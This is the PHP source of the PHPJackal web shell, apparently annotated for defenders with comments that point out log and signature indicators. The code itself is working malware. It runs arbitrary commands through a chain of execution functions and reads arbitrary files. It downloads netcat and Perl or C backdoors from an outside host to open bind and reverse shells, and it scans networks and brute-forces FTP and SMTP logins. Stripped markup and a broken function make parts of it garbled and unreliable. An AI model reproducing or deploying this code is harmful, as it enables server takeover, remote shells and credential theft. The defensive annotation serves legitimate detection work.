/* Tail of a loop whose header is above this excerpt: each value is passed
   through stripslashes() and written back into $_REQUEST (presumably undoing
   magic-quotes escaping; the guarding condition is not visible here). */
$value) { $_REQUEST[$key]=stripslashes($value); } }

/**
 * Build a link back to this script that keeps the current query string.
 *
 * Every $_GET pair is carried over unless its key is re-set in $str or is one
 * of the script's own control parameters listed in $myvars; $str is appended
 * last. Keys and values are concatenated as-is, with no URL or HTML encoding.
 *
 * Analyst note: the control-parameter names in $myvars (lower case with a
 * capital last letter) are distinctive strings to look for in web-server
 * access logs.
 *
 * @param string $str query-string fragment ("a=b&c=d") to append
 * @return string $_SERVER['PHP_SELF'], "?", the preserved pairs, then $str
 */
function hlinK($str=""){ $myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL'); $ret=$_SERVER['PHP_SELF']."?"; $new=explode("&",$str); foreach ($_GET as $key => $v){ $add=1; foreach($new as $m){ $el = explode("=", $m); if ($el[0]==$key)$add=0; } if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&"; } $ret.=$str; return $ret; }

// Optional password gate; $login_password is assigned outside this excerpt.
//  - A submitted 'fpassw' is compared with == (loose comparison); on a match the
//    cookie 'passw' is set to the unsalted MD5 of the submitted password.
//  - The Location redirect is sent whenever 'fpassw' is present, match or not.
//  - A request is admitted only if the 'passw' cookie equals md5($login_password);
//    otherwise the script stops and prints the password prompt.
// Analyst note: the cookie is a static hash of the password, so a captured cookie
// stays valid for as long as the password in the file is unchanged. A cookie named
// "passw" holding 32 hex characters is a useful indicator in proxy and WAF logs.
if(!empty($login_password)){ if(!empty($_REQUEST['fpassw'])){ if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw'])); @header("Location: ".hlinK()); } if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("
Password:
"); }

// The working directory for the rest of the request comes straight from the
// 'workingdiR' request parameter; no path restriction is applied here.
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);

/**
 * Probe one port on $ip.
 *
 * $type == 0: TCP connect via fsockopen(); returns 1 when the connection opens.
 * $type != 0: only if socket_set_timeout() exists; sends a single NUL byte over
 * UDP and returns 1 when the following one-byte read takes at least $timeout
 * seconds, i.e. the result is inferred from the read timing out, not from a reply.
 *
 * @return int 1 when the port is reported open, otherwise 0
 */
function checkthisporT($ip,$port,$timeout,$type=0){ if(!$type){ $scan=@fsockopen($ip,$port,$n,$s,$timeout); if($scan){fclose($scan);return 1;} } elseif(function_exists('socket_set_timeout')){ $scan=@fsockopen("udp://".$ip,$port); if($scan){ socket_set_timeout($scan,$timeout); @fwrite($scan,"\x00"); $s=time(); fread($scan,1); if((time()-$s)>=$timeout){fclose($scan);return 1;} } } return 0; }

// Fallback definitions of file_get_contents() / file_put_contents(), declared only
// when the runtime does not already provide them.
if (!function_exists("file_get_contents")){ function file_get_contents($addr){ $a = fopen($addr,"r"); $tmp = fread($a,filesize($a)); fclose($a); if($a)return $tmp; } } if (!function_exists("file_put_contents")){ function file_put_contents($addr,$con){ $a = fopen($addr,"w"); if(!$a)return 0; fwrite($a,$con); fclose($a); return strlen($con); } }

// Push pending output to the client so long-running actions stream their results.
function flusheR(){ flush();@ob_flush(); }

// File read primitive #1: the path in 'downloaD' is read with file_get_contents()
// and returned as an attachment, then the script exits. Nothing limits the path,
// so any file readable by the web-server account can be retrieved this way.
// The raw parameter is also placed in the Content-disposition filename.
if (!empty($_REQUEST['downloaD'])){ @ob_clean(); $dl=$_REQUEST['downloaD']; $con=file_get_contents($dl); header("Content-type: application/octet-stream"); header("Content-disposition: attachment; filename=\"$dl\";"); header("Content-length: ".strlen($con)); echo $con; exit; }

// File read primitive #2: same unrestricted read, keyed on 'imagE' and served with
// an image content type plus the file's size and modification time.
if (!empty($_REQUEST['imagE'])){ $img=$_REQUEST['imagE']; header("Content-type: imagE/gif"); header("Content-length: ".filesize($img)); header("Last-Modified: ".date("r",filemtime($img))); echo file_get_contents($img); exit; }

// Responses are marked non-cacheable (fixed Expires date in the past).
@header("Cache-Control: no-cache, must-revalidate"); @header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");

/**
 * Format a byte count for display.
 *
 * @param int|float $size size in bytes
 * @return string value rounded to two decimals with a " GB", " MB" or " KB"
 *                suffix, or the original number followed by " B" below 1024
 */
function showsizE($size){ if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB"; elseif ($size>=1048576)$size = round(($size/1048576),2)." MB"; elseif ($size>=1024)$size = round(($size/1024),2)." KB"; else $size .= " B"; return $size; }

// Platform flag: 1 when the upper-cased php_uname() string starts with "WIN".
// Analyst note: PHP resolves function names case-insensitively, so php_unamE() is
// php_uname(); content signatures for this file should match case-insensitively.
if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;

// UI fragments and banner text used by the page renderers. The HTML markup these
// strings presumably held is missing from this copy, so only text and line breaks
// remain. The banner carries the tool name and version ("PHPJackal", $v = "1.5"),
// which are stable strings for content signatures.
$errorbox = "
Error: "; $et = "
"; $v="1.5"; $msgbox="
"; $intro="
Script:
".str_repeat("-=-",25)."
Name: PHPJackal
Version: $v

Author:
".str_repeat("-=-",25)."
Name: NetJackal
Country: Iran
Website: http://netjackal.by.ru
Email: nima_501@yahoo.com
$et"; $footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et"; $hcwd=""; $t = "
"; $crack="
Dictionary:
Dictionary type:Simple (P)Combo (U:P)
Username:
Server:
$hcwd
";

/**
 * Return a short random string of lower-case ASCII letters (chr 97..122).
 *
 * The generator is re-seeded from microtime() on every call and the loop bound
 * rand(3,10) is re-evaluated on each iteration, so the length varies per call.
 *
 * Analyst note: within this range the value names a temporary output file in
 * shelL(); such names are random, so file-name indicators are of little use and
 * detection has to rely on location and on the writing process.
 *
 * @return string
 */
function namE(){ $name=''; srand((double)microtime()*100000); for ($i=0;$i<=rand(3,10);$i++){ $name.=chr(rand(97,122)); } return $name; }

/**
 * Pick a writable scratch directory.
 *
 * Checked in order: /tmp, /usr/tmp, /var/tmp, the upload_tmp_dir ini value, then
 * the TMP (or TEMP) environment variable; "." is returned when none is a
 * writable directory.
 *
 * Analyst note: these are the locations to watch for files created by the
 * web-server account.
 *
 * @return string directory path
 */
function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return "."; }

/**
 * Run $command through the first execution mechanism that is available.
 *
 * Order tried: passthru, system, exec, shell_exec (each only if callable and its
 * name does not occur in the global $disablefunctions string, which is assigned
 * elsewhere in the file), then popen, then proc_open, and finally, when $windows
 * is set, the WScript.Shell COM object running "cmd.exe /C" with output
 * redirected to a randomly named file under $_SERVER["TEMP"] that is read back
 * and deleted.
 *
 * Analyst note: because of this fallback chain, listing only some of these
 * functions in disable_functions does not remove the capability; all six need
 * to be covered, and COM on Windows. Host-side, the observable is the PHP or
 * web-server process starting a shell or cmd.exe child.
 *
 * @param string $command command line handed to the chosen mechanism
 * @return mixed whatever the selected branch stored in $exec ('' if none ran)
 */
function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; }

/**
 * Fetch the URL $get and write the response to the local path $put.
 *
 * When allow_url_fopen is enabled the fetch is a plain file_get_contents();
 * otherwise the else-branch below (continued on the next source line) speaks
 * HTTP directly over a socket.
 */
function downloadiT($get,$put){ $fo=@strtolower(ini_get('allow_url_fopen')); if($fo || $fo=='on')$con=file_get_contents($get); else{ 
// Continuation of downloadiT()'s else-branch (the function header is on the
// previous source line): a hand-built HTTP/1.0 GET to port 80 of the URL's host.
// Response lines are skipped up to the first bare CRLF, the rest is collected and
// written to $put; the function returns 1 when file_put_contents() reports a
// non-zero result, otherwise 0.
// Analyst note: the request uses a fixed User-Agent string and sets Referer to the
// bare host name, which makes this outbound fetch recognisable in egress proxy logs.
$u=parse_url($get); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $url=fsockopen($host, 80, $en, $es, 12); fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } $mk=file_put_contents($put,$con); if($mk)return 1; return 0; }

/**
 * Attempt one SMTP "AUTH LOGIN" against $addr on port 25.
 *
 * Sends "ehlo" with a random name from namE(), discards three further reply
 * lines, then submits the base64-encoded user name and password, expecting
 * 334, 334 and finally 235.
 *
 * Analyst note: on the mail server this appears as repeated AUTH LOGIN attempts
 * from one client whose EHLO name changes on every connection; per-source rate
 * limits and authentication-failure alerting are the relevant controls.
 *
 * @return int -1 when the connection fails, 0 on any unexpected reply, 1 on 235
 */
function smtplogiN($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.namE()."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; }

/**
 * Test whether $host accepts an unauthenticated message on port 25.
 *
 * Walks HELO, MAIL FROM, RCPT TO, DATA and a short message body, checking the
 * reply code after each step (220, 250, 250, 250, 354, 250). The sender address,
 * HELO name, subject and body are all random strings from namE(). In this copy
 * the RCPT TO line carries no address (it may have been lost with the stripped
 * markup; confirm against an intact sample).
 *
 * Analyst note: a server answering 250 to the final step relays for
 * unauthenticated clients; requiring authentication before relaying closes it.
 *
 * @return int -1 when the connection fails, 0 on any unexpected reply, 1 when
 *             every step is accepted
 */
function checksmtP($host,$timeout){ $from=strtolower(namE())."@".strtolower(namE()).".com"; $sock=@fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.namE()."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".namE()." ".namE()." 
<$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; }

/**
 * Send one HTTP/1.0 request to port 80 of $url's host and test the response.
 *
 * The request line is "$method path?query". For GET only the Host header is
 * sent; otherwise form-encoded headers follow and the "?"-prefixed query string
 * is repeated as the body. With the default $search of '200' the first three
 * characters of the first response line are compared with "200"; with any other
 * $search every non-empty response line is scanned for that substring.
 *
 * @param string $url     target URL (host, path and query are used)
 * @param string $method  HTTP method, upper-cased before use
 * @param string $search  text to look for; empty means '200'
 * @param int    $timeout connect timeout in seconds
 * @return int 1 when the check matches, otherwise 0
 */
function check_urL($url,$method,$search,$timeout){ if(empty($search))$search='200'; $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} while(!feof($sock)){ $res=trim(fgets($sock)); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; }

/**
 * Read the "Server:" response header of the web server at $host (port 80).
 *
 * Requests a path made of two random namE() strings with a bare HTTP/1.0 GET
 * (no Host header) and returns the text after the first space of the first
 * line containing "Server:".
 *
 * Analyst note: in access logs this is an HTTP/1.0 request without a Host
 * header for a random lower-case path. Trimming or removing the Server banner
 * limits what this lookup returns.
 *
 * @return string|int header value, -1 when no such header was seen, 0 when the
 *                    connection failed
 */
function get_sw_namE($host,$timeout){ $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=namE().namE(); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; }

// snmpchecK() starts here and continues on the next source line. $packet is a
// hand-assembled SNMP message: version field 0 (SNMPv1), the community string
// $com, and a GetRequest PDU (tag 0xA0) for OID 1.3.6.1.2.1.1.1.0 (sysDescr.0).
// The outer length bytes (0x26, 0x19) are constants, not derived from strlen($com).
// Analyst note: SNMPv1 community strings are the only secret in this exchange;
// restricting SNMP by source address and retiring v1/v2c where possible are the
// relevant controls.
function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). $com. chr(0xA0). chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). chr(0x01). chr(0x01). $n. chr(0x05). 
$n; $sock=@fsockopen("udp://$ip",161); socket_set_timeout($sock,$timeout); @fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); return $res; } $safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} $disablefunctions = @ini_get('disable_functions'); if (!function_exists("str_repeat")){ function str_repeat($str,$c){ $r=""; for($i=0; $i < $cu; $i++)$r.=$str; return $r; } } function brshelL(){ global $errorbox, $windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/backdoor'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=namE(); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; $c=($_REQUEST['C'])?1:0; if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.=".exe"; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winbind.pl",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl.exe $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.pl",$name); if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); echo "Backdoor is waiting for you on $port.
"; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winrc.pl",$name); shelL("attrib +H $name"); if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.pl",$name); if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); } } echo "Done!";} else{echo "
Bind shelL:
Port:
Type:PERL"; if($windows)echo "EXE"; else echo "C";echo"
$hcwd
Reverse shelL:
IP:
Port:
Type:PERL"; if($windows)echo "EXE"; else echo "C";echo"
$hcwd
$et";}} function showimagE($img){ echo "
";} function editoR($file){ global $errorbox,$et,$hcwd; if (is_file($file)){ if (!is_readable($file)){echo "$errorbox File is not readable$et
";} if (!is_writeable($file)){echo "$errorbox File is not writeable$et
";} $data = file_get_contents($file); echo "
$hcwd

"; } else {echo "
$hcwd

"; } echo "$hcwd
"; } function webshelL(){ global $windows,$hcwd; if($windows){ $alias=""; } else{ $alias=""; if(is_dir('/etc/valiases'))$alias.="";if(is_dir('/etc/vdomainaliases'))$alias.="";if(file_exists('/var/cpanel/accounting.log'))$alias.=""; if(is_dir('/var/spool/mail/'))$alias.=""; } echo "
Location:

Web Shell:
$hcwd
$hcwd
"; } function maileR(){ global $msgbox,$et,$hcwd; $cwd= getcwd(); if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; if (!mail($to,$subject,$body,"From: $from"))break; echo "$msgboxMail sent!
$et"; } echo "

$hcwd
Mailer:
SMTP".ini_get('SMTP')." (".ini_get('smtp_port').")
From:$hcwd
To:
Subject:
Body:
$et"; } function scanneR(){ global $hcwd; if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; echo "Port scanning started against ".htmlspecialchars($target).":
"; $start=time(); for($i=$from;$i<=$to;$i++){ if($tcp){ if (checkthisporT($target,$i,$timeout)){ $nu++; $ser=""; if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; echo "$nu) $i $ser (Connect) [TCP]
"; } } if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]
";} flusheR(); } $time=time()-$start; echo "Done! ($time seconds)
"; } elseif (!empty($_REQUEST['securityscanner'])){ echo ""; $start=time(); $from=$_REQUEST['from']; $to=(int)$_REQUEST['to']; $timeout=(int)$_REQUEST['timeout']; $f = substr($from,strrpos($from,".")+1); $from = substr($from,0,strrpos($from,".")); if(!empty($_REQUEST['httpscanner'])){ echo "Loading webserver bug list..."; flusheR(); $buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); if($dl){$file=file($buglist);echo "Done! scanning started.

";}else echo "Failed!!! scanning started without webserver security testing...

"; flusheR(); }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:

";} for($i=$f;$i<=$to;$i++){ $output=0; $ip="$from.$i"; if(!empty($_REQUEST['nslookup'])){ $hn=gethostbyaddr($ip); if($hn!=$ip)echo "$ip [$hn]
";} flusheR(); if(!empty($_REQUEST['ipscanner'])){ $port=$_REQUEST['port']; if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; $open=$ser=""; foreach($p as $po){ $scan=checkthisporT($ip,$po,$timeout); if ($scan){ $ser=""; if($ser=getservbyport($po,"tcp"))$ser="($ser)"; $open.=" $po$ser "; } } if($open){echo "$ip) Open ports:$open
";$output=1;} flusheR(); } if(!empty($_REQUEST['httpbanner'])){ $res=get_sw_namE($ip,$timeout); if($res){ echo "$ip) Webserver software: "; if($res==-1)echo "Unknow"; else echo $res; echo "
"; $output=1; } flusheR(); } if(!empty($_REQUEST['httpscanner'])){ if(checkthisporT($ip,80,$timeout) && !empty($file)){ $admin=array('/admin/','/adm/'); $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); foreach ($file as $v){ $vuln=array(); $v=trim($v); if(!$v || $v{0}=='#')continue; $v=str_replace('","','^',$v); $v=str_replace('"','',$v); $vuln=explode('^',$v); $page=$cqich=$nukech=$adminch=$userch=$vuln[1]; if(strstr($page,'@CGIDIRS')) foreach($cgi as $cg){ $cqich=str_replace('@CGIDIRS',$cg,$page); $url="http://$ip$cqich"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} flusheR(); } elseif(strstr($page,'@ADMINDIRS')) foreach ($admin as $cg){ $adminch=str_replace('@ADMINDIRS',$cg,$page); $url="http://$ip$adminch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} flusheR(); } elseif(strstr($page,'@USERS')) foreach ($users as $cg){ $userch=str_replace('@USERS',$cg,$page); $url="http://$ip$userch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} flusheR(); } elseif(strstr($page,'@NUKE')) foreach ($nuke as $cg){ $nukech=str_replace('@NUKE',$cg,$page); $url="http://$ip$nukech"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} flusheR(); } else{ $url="http://$ip$page"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url
";} flusheR(); } } } } if(!empty($_REQUEST['smtprelay'])){ if(checkthisporT($ip,25,$timeout)){ $res=''; $res=checksmtP($ip,$timeout); if($res==1){echo "$ip) SMTP relay found.
";$output=1;}flusheR(); } } if(!empty($_REQUEST['snmpscanner'])){ if(checkthisporT($ip,161,$timeout,1)){ $com=$_REQUEST['com']; $coms=$res=""; if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; foreach ($c as $v){ $ret=snmpchecK($ip,$v,$timeout); if($ret)$coms .=" $v "; } if ($coms!=""){echo "$ip) SNMP FOUND: $coms
";$output=1;} flusheR(); } } if(!empty($_REQUEST['ftpscanner'])){ if(checkthisporT($ip,21,$timeout)){ $usps=explode(',',$_REQUEST['userpass']); foreach ($usps as $v){ $user=substr($v,0,strpos($v,':')); $pass=substr($v,strpos($v,':')+1); if($pass=='[BLANK]')$pass=''; $ftp=@ftp_connect($ip,21,$timeout); if ($ftp){ if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)."
";} } flusheR(); } } } if($output)echo "
"; flusheR(); } $time=time()-$start; echo "Done! ($time seconds)
"; if(!empty($buglist))unlink($buglist); } else{ $chbox=(extension_loaded('sockets'))?"TCPUDP":""; echo "

Port scanner:
Target:
From:
To:
Timeout:
$chbox$hcwd
"; $host = substr($host,0,strrpos($host,".")); echo "
security scanner:
From: NS lookup
To:xxx.xxx.xxx.$hcwd
Timeout:
Port scanner:
Get web bannerWebserver security scanning   SMTP relay check
FTP password:
SNMP:

"; } } function sysinfO(){ global $windows,$disablefunctions,$safemode; $cwd= getcwd(); $mil="$osn",$os); $os = str_replace($ker,"${mil}Linux+Kernel\">$ker",$os); $inpa=':'; }else{ $sam = $sysroot."\\system32\\config\\SAM"; $inpa=';'; $os = str_replace($osn,"${mil}MS+Windows\">$osn",$os); } $software=str_replace("Apache","${mil}Apache\">Apache",$_SERVER['SERVER_SOFTWARE']); echo ""; if ($windows){ echo ""; } else { echo ""; } $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); echo "";if (function_exists('curl_init')) echo "";echo "
Server information:
Server:".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "
Operation system:$os$osver
Web server application:$software
CPU:$CPU
Disk status:$disksize
User domain:";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "
User name:";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "
Windows directory:$sysroot
Sam file:";if (is_readable(($sam)))echo "Readable"; else echo "Not readable";echo "
Passwd file:"; if (is_readable('/etc/passwd')) echo "Readable"; else echo'Not readable';echo "
Cpanel log file:"; if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "Readable"; else echo "Not readable";}else echo "Not found"; echo "
${mil}PHP\">PHP version:".PHP_VERSION." (more...)
Zend version:";if (function_exists('zend_version')) echo "".zend_version()."";else echo "Not Found";echo "
Include path:".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."
PHP Modules:";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "
Disabled functions:";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"
Safe mode:$safemode
Open base dir:$basedir
DBMS:";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq
cURL support:Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "
User information:
IP:$uip
Agent:".getenv('HTTP_USER_AGENT')."
"; } function checksuM($file){ global $et; echo "
MD5: ".md5_file($file)."
